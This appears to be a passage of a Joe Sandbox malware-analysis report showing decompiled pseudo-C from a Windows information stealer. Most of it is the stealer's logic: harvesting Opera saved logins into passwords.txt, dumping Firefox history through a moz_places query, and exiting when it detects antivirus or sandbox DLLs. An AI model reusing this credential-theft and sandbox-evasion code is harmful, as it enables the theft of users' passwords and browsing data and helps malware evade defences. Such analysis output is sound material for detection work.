                                                                                					_t294 = _t353 - 0xd4;
                                                                                					E00402C34(_t353 - 0xd4, 1, _t285);
                                                                                					_t366 =  *((intOrPtr*)(_t353 - 0x148)) - _t285;
                                                                                					if( *((intOrPtr*)(_t353 - 0x148)) == _t285) {
                                                                                						L46:
                                                                                						return E00421A61(_t285, _t337, _t340);
                                                                                					} else {
                                                                                						_t179 = E00415BB2(_t285, 1, _t353 - 0xf0, _t366);
                                                                                						 *(_t353 - 4) = 3;
                                                                                						_t181 = E0040D3FA(_t294, _t353 - 0xb8,  *0x449e74, _t179);
                                                                                						 *(_t353 - 4) = 4;
                                                                                						_t183 = E0040D3C3(_t294, _t353 - 0xd4, _t181,  *0x449c1c);
                                                                                						_t358 = _t356 + 0x18;
                                                                                						_push(_t183);
                                                                                						_push(_t353 - 0x210);
                                                                                						 *(_t353 - 4) = 5;
                                                                                						E0041443B(_t285, 1, _t353 - 0xf0, _t366);
                                                                                						E00402C34(_t353 - 0xd4, 1, _t285);
                                                                                						E00402C34(_t353 - 0xb8, 1, _t285);
                                                                                						E00402C34(_t353 - 0xf0, 1, _t285);
                                                                                						_t189 = 0xf;
                                                                                						 *((intOrPtr*)(_t353 - 0x18)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x1c)) = _t285;
                                                                                						 *((char*)(_t353 - 0x2c)) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x14c)) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x88)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x8c)) = _t285;
                                                                                						 *(_t353 - 0x9c) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x6c)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x70)) = _t285;
                                                                                						 *(_t353 - 0x80) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x34)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x38)) = _t285;
                                                                                						 *(_t353 - 0x48) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x50)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x54)) = _t285;
                                                                                						 *(_t353 - 0x64) = _t285;
                                                                                						 *(_t353 - 4) = 0xe;
                                                                                						_t190 = E004037E9(_t353 - 0xd4, L"passwords.txt");
                                                                                						_t367 =  *((intOrPtr*)(_t190 + 0x14)) - 8;
                                                                                						if( *((intOrPtr*)(_t190 + 0x14)) >= 8) {
                                                                                							_t190 =  *_t190;
                                                                                						}
                                                                                						_t191 = E0041E704(_t190, L"a+");
                                                                                						_pop(_t299);
                                                                                						_t337 = 0;
                                                                                						_t343 = _t353 - 0xd4;
                                                                                						 *((intOrPtr*)(_t353 - 0x148)) = _t191;
                                                                                						E00403960(0, _t353 - 0xd4, 0);
                                                                                						while(1) {
                                                                                							_push(0xa);
                                                                                							_push(_t353 +  *((intOrPtr*)( *((intOrPtr*)(_t353 - 0x210)) + 4)) - 0x210);
                                                                                							_push(E00414FCB(_t285, _t299, _t337, _t343, _t367) & 0x000000ff);
                                                                                							_push(_t353 - 0x2c);
                                                                                							_push(_t353 - 0x210);
                                                                                							_t299 =  *((intOrPtr*)( *((intOrPtr*)(E00415307(_t285, _t330, _t337, _t343, _t367))) + 4)) + _t200;
                                                                                							_t358 = _t358 + 0xc;
                                                                                							asm("sbb eax, eax");
                                                                                							_t205 =  !( ~( *(_t299 + 0xc) & 0x00000006));
                                                                                							_t368 = _t299 & _t205;
                                                                                							if((_t299 & _t205) == 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t344 = E0040C664(_t353 - 0x2c,  *0x449bc4,  *((intOrPtr*)(_t353 - 0x14c)) + 1);
                                                                                							__eflags = _t344 - 0xffffffff;
                                                                                							if(_t344 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t320 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t320 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t268 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t334 =  *((intOrPtr*)(_t353 - 0x1c)) + _t320;
                                                                                								_t321 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t321 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x158, _t268 + _t321 + 0xfffffff9, _t334);
                                                                                								_t299 = _t353 - 0x9c;
                                                                                								E00403C13(_t353 - 0x9c, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t346 = E0040C664(_t353 - 0x2c,  *0x449d68, _t344 + 1);
                                                                                							__eflags = _t346 - 0xffffffff;
                                                                                							if(_t346 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t317 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t317 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t260 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t333 =  *((intOrPtr*)(_t353 - 0x1c)) + _t317;
                                                                                								_t318 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t318 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x154, _t260 + _t318 + 0xfffffff9, _t333);
                                                                                								_t299 = _t353 - 0x80;
                                                                                								E00403C13(_t353 - 0x80, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t348 = E0040C664(_t353 - 0x2c,  *0x449e40, _t346 + 1);
                                                                                							__eflags = _t348 - 0xffffffff;
                                                                                							if(_t348 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t314 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t314 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t252 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t332 =  *((intOrPtr*)(_t353 - 0x1c)) + _t314;
                                                                                								_t315 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t315 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x150, _t252 + _t315 + 0xfffffff9, _t332);
                                                                                								_t299 = _t353 - 0x48;
                                                                                								E00403C13(_t353 - 0x48, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t215 = E0040C664(_t353 - 0x2c,  *0x449e6c, _t348 + 1);
                                                                                							 *((intOrPtr*)(_t353 - 0x14c)) = _t215;
                                                                                							__eflags = _t215 - 0xffffffff;
                                                                                							if(_t215 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 0x1b);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t311 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t311 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t240 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t331 =  *((intOrPtr*)(_t353 - 0x1c)) + _t311;
                                                                                								_t312 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t312 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x160, _t240 + _t312 + 0xfffffff9, _t331);
                                                                                								_t358 = _t358 - 0x1c;
                                                                                								 *((intOrPtr*)(_t353 - 0x15c)) = _t358;
                                                                                								E0040410F(_t358, _t353 - 0x2c);
                                                                                								_push(_t353 - 0xb8);
                                                                                								_t248 = E00417286(_t353 - 0x160, _t337, _t358, __eflags);
                                                                                								_t337 = _t353 - 0x64;
                                                                                								 *(_t353 - 4) = 0xf;
                                                                                								E0040CFB8(_t353 - 0x64, _t248);
                                                                                								_t299 = _t353 - 0xb8;
                                                                                								 *(_t353 - 4) = 0xe;
                                                                                								E00402C34(_t353 - 0xb8, 1, 0);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t343 = 0x43e028;
                                                                                							_t330 = _t353 - 0x9c;
                                                                                							__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x8c)), _t353 - 0x9c, 0x43e028, _t285);
                                                                                							if(__eflags != 0) {
                                                                                								_t330 = _t353 - 0x80;
                                                                                								__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x70)), _t353 - 0x80, 0x43e028, _t285);
                                                                                								if(__eflags != 0) {
                                                                                									_t330 = _t353 - 0x48;
                                                                                									__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x38)), _t353 - 0x48, 0x43e028, _t285);
                                                                                									if(__eflags != 0) {
                                                                                										_t330 = _t353 - 0x64;
                                                                                										__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x54)), _t353 - 0x64, 0x43e028, _t285);
                                                                                										if(__eflags != 0) {
                                                                                											_push( *0x449fd0);
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, 0x43e028, __eflags);
                                                                                											_push(":");
                                                                                											_push(_t353 - 0x144);
                                                                                											_t337 = _t353 - 0x9c;
                                                                                											_t226 = E0040D337(_t285, _t353 - 0x9c, 0x43e028, __eflags);
                                                                                											 *(_t353 - 4) = 0x10;
                                                                                											_t227 = E0040D39B(_t226, _t226, _t353 - 0x128, _t353 - 0x80);
                                                                                											_t359 = _t358 + 0x18;
                                                                                											__eflags =  *((intOrPtr*)(_t227 + 0x14)) - 0x10;
                                                                                											if(__eflags >= 0) {
                                                                                												_t227 =  *_t227;
                                                                                											}
                                                                                											_push(_t227);
                                                                                											_push("Host: %s\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t360 = _t359 + 0xc;
                                                                                											E00402C34(_t353 - 0x128, 1, _t285);
                                                                                											 *(_t353 - 4) = 0xe;
                                                                                											E00402C34(_t353 - 0x144, 1, _t285);
                                                                                											__eflags =  *((intOrPtr*)(_t353 - 0x34)) - 0x10;
                                                                                											_t231 =  *(_t353 - 0x48);
                                                                                											if(__eflags < 0) {
                                                                                												_t231 = _t353 - 0x48;
                                                                                											}
                                                                                											_push(_t231);
                                                                                											_push("Login: %s\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t233 =  *(_t353 - 0x64);
                                                                                											_t361 = _t360 + 0xc;
                                                                                											__eflags =  *((intOrPtr*)(_t353 - 0x50)) - 0x10;
                                                                                											if(__eflags < 0) {
                                                                                												_t233 = _t353 - 0x64;
                                                                                											}
                                                                                											_push(_t233);
                                                                                											_push("Password: %s\n\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t358 = _t361 + 0xc;
                                                                                											E00403A16(_t353 - 0x9c, __eflags, _t343, _t285);
                                                                                											E00403A16(_t353 - 0x80, __eflags, _t343, _t285);
                                                                                											E00403A16(_t353 - 0x48, __eflags, _t343, _t285);
                                                                                											_t299 = _t353 - 0x64;
                                                                                											E00403A16(_t353 - 0x64, __eflags, _t343, _t285);
                                                                                											 *0x44a08c =  *0x44a08c + 1;
                                                                                											__eflags =  *0x44a08c;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                						E0041EAA2(_t285, _t337, _t343, _t368);
                                                                                						_t340 = 1;
                                                                                						E00402C34(_t353 - 0x64, 1, _t285);
                                                                                						E00402C34(_t353 - 0x48, 1, _t285);
                                                                                						E00402C34(_t353 - 0x80, 1, _t285);
                                                                                						E00402C34(_t353 - 0x9c, 1, _t285);
                                                                                						E00402C34(_t353 - 0x2c, 1, _t285);
                                                                                						 *(_t353 - 4) =  *(_t353 - 4) | 0xffffffff;
                                                                                						E00414538(_t353 - 0x1a8, 1,  *(_t353 - 4));
                                                                                						 *((intOrPtr*)(_t353 - 0x1a8)) = 0x441150;
                                                                                						E0041D4EA(_t353 - 0x1a8);
                                                                                						goto L46;
                                                                                					}
                                                                                				}
                                                                                				 *((intOrPtr*)(_t353 - 0x148)) = 1;
                                                                                				if((_t173 & 0x00000010) == 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L4;
                                                                                			}














































                                                                                0x004112da
                                                                                0x004112da
                                                                                0x004112da
                                                                                0x004112da
                                                                                0x004112e4
                                                                                0x004112ef
                                                                                0x004112f5
                                                                                0x004112f7
                                                                                0x00411307
                                                                                0x0041130f
                                                                                0x00411321
                                                                                0x00411326
                                                                                0x00411330
                                                                                0x00411334
                                                                                0x0041133d
                                                                                0x0041133f
                                                                                0x0041133f
                                                                                0x00411342
                                                                                0x0041134b
                                                                                0x0041135b
                                                                                0x0041135b
                                                                                0x00411361
                                                                                0x00411365
                                                                                0x0041136b
                                                                                0x00411371
                                                                                0x00411379
                                                                                0x00411386
                                                                                0x0041138b
                                                                                0x00411391
                                                                                0x00411397
                                                                                0x0041139c
                                                                                0x004113a2
                                                                                0x00411884
                                                                                0x00411889
                                                                                0x004113a8
                                                                                0x004113ae
                                                                                0x004113b4
                                                                                0x004113c8
                                                                                0x004113d0
                                                                                0x004113e2
                                                                                0x004113e7
                                                                                0x004113ea
                                                                                0x004113f1
                                                                                0x004113f2
                                                                                0x004113f6
                                                                                0x00411403
                                                                                0x00411410
                                                                                0x00411419
                                                                                0x00411420
                                                                                0x00411421
                                                                                0x00411424
                                                                                0x00411427
                                                                                0x0041142a
                                                                                0x00411430
                                                                                0x00411436
                                                                                0x0041143c
                                                                                0x00411442
                                                                                0x00411445
                                                                                0x00411448
                                                                                0x0041144b
                                                                                0x0041144e
                                                                                0x00411451
                                                                                0x00411454
                                                                                0x00411457
                                                                                0x0041145a
                                                                                0x00411468
                                                                                0x0041146c
                                                                                0x00411471
                                                                                0x00411475
                                                                                0x00411477
                                                                                0x00411477
                                                                                0x0041147f
                                                                                0x00411485
                                                                                0x00411487
                                                                                0x00411489
                                                                                0x0041148f
                                                                                0x00411495
                                                                                0x004117ce
                                                                                0x004117d7
                                                                                0x004117e0
                                                                                0x004117e9
                                                                                0x004117ed
                                                                                0x004117f4
                                                                                0x004117ff
                                                                                0x00411809
                                                                                0x0041180e
                                                                                0x00411810
                                                                                0x00411812
                                                                                0x00411814
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004114b6
                                                                                0x004114b8
                                                                                0x004114bb
                                                                                0x004114c3
                                                                                0x004114c8
                                                                                0x004114cc
                                                                                0x004114cf
                                                                                0x004114d1
                                                                                0x004114d1
                                                                                0x004114d4
                                                                                0x004114d8
                                                                                0x004114db
                                                                                0x004114de
                                                                                0x004114e1
                                                                                0x004114e3
                                                                                0x004114e3
                                                                                0x004114f6
                                                                                0x00411503
                                                                                0x00411509
                                                                                0x0041150e
                                                                                0x0041150e
                                                                                0x0041150e
                                                                                0x00411521
                                                                                0x00411523
                                                                                0x00411526
                                                                                0x0041152e
                                                                                0x00411533
                                                                                0x00411537
                                                                                0x0041153a
                                                                                0x0041153c
                                                                                0x0041153c
                                                                                0x0041153f
                                                                                0x00411543
                                                                                0x00411546
                                                                                0x00411549
                                                                                0x0041154c
                                                                                0x0041154e
                                                                                0x0041154e
                                                                                0x00411561
                                                                                0x0041156e
                                                                                0x00411571
                                                                                0x00411576
                                                                                0x00411576
                                                                                0x00411576
                                                                                0x00411589
                                                                                0x0041158b
                                                                                0x0041158e
                                                                                0x00411596
                                                                                0x0041159b
                                                                                0x0041159f
                                                                                0x004115a2
                                                                                0x004115a4
                                                                                0x004115a4
                                                                                0x004115a7
                                                                                0x004115ab
                                                                                0x004115ae
                                                                                0x004115b1
                                                                                0x004115b4
                                                                                0x004115b6
                                                                                0x004115b6
                                                                                0x004115c9
                                                                                0x004115d6
                                                                                0x004115d9
                                                                                0x004115de
                                                                                0x004115de
                                                                                0x004115de
                                                                                0x004115ec
                                                                                0x004115f1
                                                                                0x004115f7
                                                                                0x004115fa
                                                                                0x00411606
                                                                                0x0041160b
                                                                                0x0041160f
                                                                                0x00411612
                                                                                0x00411614
                                                                                0x00411614
                                                                                0x00411617
                                                                                0x0041161b
                                                                                0x0041161e
                                                                                0x00411621
                                                                                0x00411624
                                                                                0x00411626
                                                                                0x00411626
                                                                                0x00411639
                                                                                0x0041163e
                                                                                0x00411646
                                                                                0x0041164d
                                                                                0x00411658
                                                                                0x00411659
                                                                                0x00411660
                                                                                0x00411663
                                                                                0x00411667
                                                                                0x00411670
                                                                                0x00411676
                                                                                0x0041167a
                                                                                0x0041167f
                                                                                0x0041167f
                                                                                0x0041167f
                                                                                0x00411688
                                                                                0x0041168e
                                                                                0x00411699
                                                                                0x0041169b
                                                                                0x004116a6
                                                                                0x004116ae
                                                                                0x004116b0
                                                                                0x004116bb
                                                                                0x004116c3
                                                                                0x004116c5
                                                                                0x004116d0
                                                                                0x004116d8
                                                                                0x004116da
                                                                                0x004116e0
                                                                                0x004116e6
                                                                                0x004116ec
                                                                                0x004116f7
                                                                                0x004116fc
                                                                                0x004116fd
                                                                                0x00411703
                                                                                0x00411715
                                                                                0x00411719
                                                                                0x0041171e
                                                                                0x00411721
                                                                                0x00411725
                                                                                0x00411727
                                                                                0x00411727
                                                                                0x00411729
                                                                                0x0041172a
                                                                                0x0041172f
                                                                                0x00411735
                                                                                0x0041173a
                                                                                0x00411746
                                                                                0x00411754
                                                                                0x00411758
                                                                                0x0041175d
                                                                                0x00411761
                                                                                0x00411764
                                                                                0x00411766
                                                                                0x00411766
                                                                                0x00411769
                                                                                0x0041176a
                                                                                0x0041176f
                                                                                0x00411775
                                                                                0x0041177a
                                                                                0x0041177d
                                                                                0x00411780
                                                                                0x00411784
                                                                                0x00411786
                                                                                0x00411786
                                                                                0x00411789
                                                                                0x0041178a
                                                                                0x0041178f
                                                                                0x00411795
                                                                                0x0041179a
                                                                                0x004117a5
                                                                                0x004117af
                                                                                0x004117b9
                                                                                0x004117c0
                                                                                0x004117c3
                                                                                0x004117c8
                                                                                0x004117c8
                                                                                0x004117c8
                                                                                0x004116da
                                                                                0x004116c5
                                                                                0x004116b0
                                                                                0x0041169b
                                                                                0x0041181a
                                                                                0x00411820
                                                                                0x00411829
                                                                                0x0041182e
                                                                                0x00411838
                                                                                0x00411842
                                                                                0x0041184f
                                                                                0x00411859
                                                                                0x0041185e
                                                                                0x00411868
                                                                                0x00411874
                                                                                0x0041187e
                                                                                0x00000000
                                                                                0x00411883
                                                                                0x004113a2
                                                                                0x0041134d
                                                                                0x00411359
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004112E4
                                                                                  • Part of subcall function 00415BB2: GetUserNameA.ADVAPI32(?,?), ref: 00415BE0
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,\Opera Software\,?,00000000), ref: 004175EF
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414013), ref: 0041761E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,\Opera Stable\,?,?,?,?,00000000), ref: 00411342
                                                                                  • Part of subcall function 00403EAE: std::_Xinvalid_argument.LIBCPMT ref: 00403EC1
                                                                                  • Part of subcall function 00403EAE: _memmove.LIBCMT ref: 00403EFC
                                                                                • _fprintf.LIBCMT ref: 004116EC
                                                                                • _fprintf.LIBCMT ref: 00411735
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _fprintf.LIBCMT ref: 00411775
                                                                                • _fprintf.LIBCMT ref: 00411795
                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041187E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$ByteCharMultiWide_memmove$AttributesFileH_prolog3_Ios_base_dtorNameUserXinvalid_argumentstd::_std::ios_base::_
                                                                                • String ID: (C$Host: %s$Login: %s$Password: %s$passwords.txt
                                                                                • API String ID: 856706163-654174680
                                                                                • Opcode ID: 699470228641c97b704b6bb7bcefa3ddd210648f85178f3bba91759b76444295
                                                                                • Instruction ID: e4472bc2177690b71c4fb2eea9515a3b38977c32137634e10e36fb75ffdc79b5
                                                                                • Opcode Fuzzy Hash: 699470228641c97b704b6bb7bcefa3ddd210648f85178f3bba91759b76444295
                                                                                • Instruction Fuzzy Hash: 9E029071D00218AFDF24DBA9CC81EDEB778AF55308F0045AAE519B31E1DB785E88CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E00410C17(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t23;
                                                                                				void* _t38;
                                                                                				int _t40;
                                                                                				void* _t43;
                                                                                				void* _t48;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                				CHAR* _t64;
                                                                                				void* _t65;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				signed int _t71;
                                                                                				void* _t73;
                                                                                				void* _t75;
                                                                                				void* _t77;
                                                                                
                                                                                				_t62 = __edx;
                                                                                				_t52 = __ebx;
                                                                                				_t71 = _t73 - 0x198;
                                                                                				_t23 =  *0x447674; // 0x4124c941
                                                                                				 *(_t71 + 0x194) = _t23 ^ _t71;
                                                                                				 *((intOrPtr*)(_t71 - 0x80)) =  *((intOrPtr*)(_t71 + 0x1a0));
                                                                                				_t64 = __ecx;
                                                                                				GetCurrentDirectoryA(0x104, _t71 + 0x90);
                                                                                				 *0x44a1b8(_t71 + 0x90, "\\temp", _t63, _t67);
                                                                                				CopyFileA(_t64, _t71 + 0x90, 1);
                                                                                				E00427E30(_t71 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t71 - 0x74, "History\\%s_%s.txt",  *((intOrPtr*)(_t71 - 0x80)), __ebx);
                                                                                				_t38 =  *0x44a0a4(_t71 + 0x90, _t71 - 0x7c);
                                                                                				_t75 = _t73 - 0x218 + 0x24;
                                                                                				if(_t38 == 0) {
                                                                                					_t43 =  *0x44a058( *((intOrPtr*)(_t71 - 0x7c)), "SELECT url FROM moz_places", 0xffffffff, _t71 - 0x78, 0);
                                                                                					_t77 = _t75 + 0x14;
                                                                                					if(_t43 == 0) {
                                                                                						_t66 = E00420300(_t71 - 0x74, "w");
                                                                                						if(_t66 != 0) {
                                                                                							_t48 =  *0x44a074( *((intOrPtr*)(_t71 - 0x78)));
                                                                                							while(1) {
                                                                                								_t81 = _t48 - 0x64;
                                                                                								if(_t48 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								E0041E879(_t52, _t66, 0, __eflags);
                                                                                								_t48 =  *0x44a074( *((intOrPtr*)(_t71 - 0x78)), _t66, "%s\n",  *0x44a094( *((intOrPtr*)(_t71 - 0x78)), 0));
                                                                                								_t77 = _t77 + 0x18;
                                                                                							}
                                                                                							_push(_t66);
                                                                                							E0041EAA2(_t52, _t66, 0, _t81);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t71 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t71 - 0x7c)));
                                                                                				}
                                                                                				_t40 = DeleteFileA(_t71 + 0x90);
                                                                                				_pop(_t65);
                                                                                				_pop(_t70);
                                                                                				return E0041DEB4(_t40, _t52,  *(_t71 + 0x194) ^ _t71, _t62, _t65, _t70);
                                                                                			}






















                                                                                0x00410c17
                                                                                0x00410c17
                                                                                0x00410c18
                                                                                0x00410c25
                                                                                0x00410c2c
                                                                                0x00410c3a
                                                                                0x00410c4a
                                                                                0x00410c4c
                                                                                0x00410c5e
                                                                                0x00410c6e
                                                                                0x00410c7c
                                                                                0x00410c8e
                                                                                0x00410c9f
                                                                                0x00410ca5
                                                                                0x00410caa
                                                                                0x00410cbf
                                                                                0x00410cc5
                                                                                0x00410cca
                                                                                0x00410cda
                                                                                0x00410ce0
                                                                                0x00410ce5
                                                                                0x00410d10
                                                                                0x00410d10
                                                                                0x00410d13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410cff
                                                                                0x00410d07
                                                                                0x00410d0d
                                                                                0x00410d0d
                                                                                0x00410d15
                                                                                0x00410d16
                                                                                0x00410d1b
                                                                                0x00410ce0
                                                                                0x00410d1f
                                                                                0x00410d28
                                                                                0x00410d2f
                                                                                0x00410d37
                                                                                0x00410d43
                                                                                0x00410d46
                                                                                0x00410d53

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C), ref: 00410C4C
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410C5E
                                                                                • CopyFileA.KERNEL32 ref: 00410C6E
                                                                                • _memset.LIBCMT ref: 00410C7C
                                                                                • wsprintfA.USER32 ref: 00410C8E
                                                                                • DeleteFileA.KERNEL32(?), ref: 00410D37
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 00410CFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s$(>A(C$History\%s_%s.txt$SELECT url FROM moz_places$\temp
                                                                                • API String ID: 2003248957-2615988106
                                                                                • Opcode ID: 9ec1d1811f92c54f2c3e68a46ede3bdb6cb54a9a836e3299bd88e3546e774ad8
                                                                                • Instruction ID: 0d36796b35f77b62300b62df0302a96afa3318edf7f95a5120b5e78e4b8337b5
                                                                                • Opcode Fuzzy Hash: 9ec1d1811f92c54f2c3e68a46ede3bdb6cb54a9a836e3299bd88e3546e774ad8
                                                                                • Instruction Fuzzy Hash: 72318272940118AFDB209FB5EC49EEE7B7CEF05314F20012AF509D2051DB7995948F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0040104C(void* __ecx) {
                                                                                				void* _t1;
                                                                                				void* _t2;
                                                                                				void* _t4;
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				void* _t7;
                                                                                				void* _t8;
                                                                                				void* _t9;
                                                                                				void* _t10;
                                                                                				void* _t11;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                
                                                                                				_t2 = E00401000(_t1, __ecx, L"avghookx.dll");
                                                                                				_pop(_t4);
                                                                                				if(_t2 != 0) {
                                                                                					L11:
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t4, L"avghooka.dll");
                                                                                				_pop(_t5);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t5, L"snxhk.dll");
                                                                                				_pop(_t6);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t6, L"sbiedll.dll");
                                                                                				_pop(_t7);
                                                                                				if(_t2 != 0) {
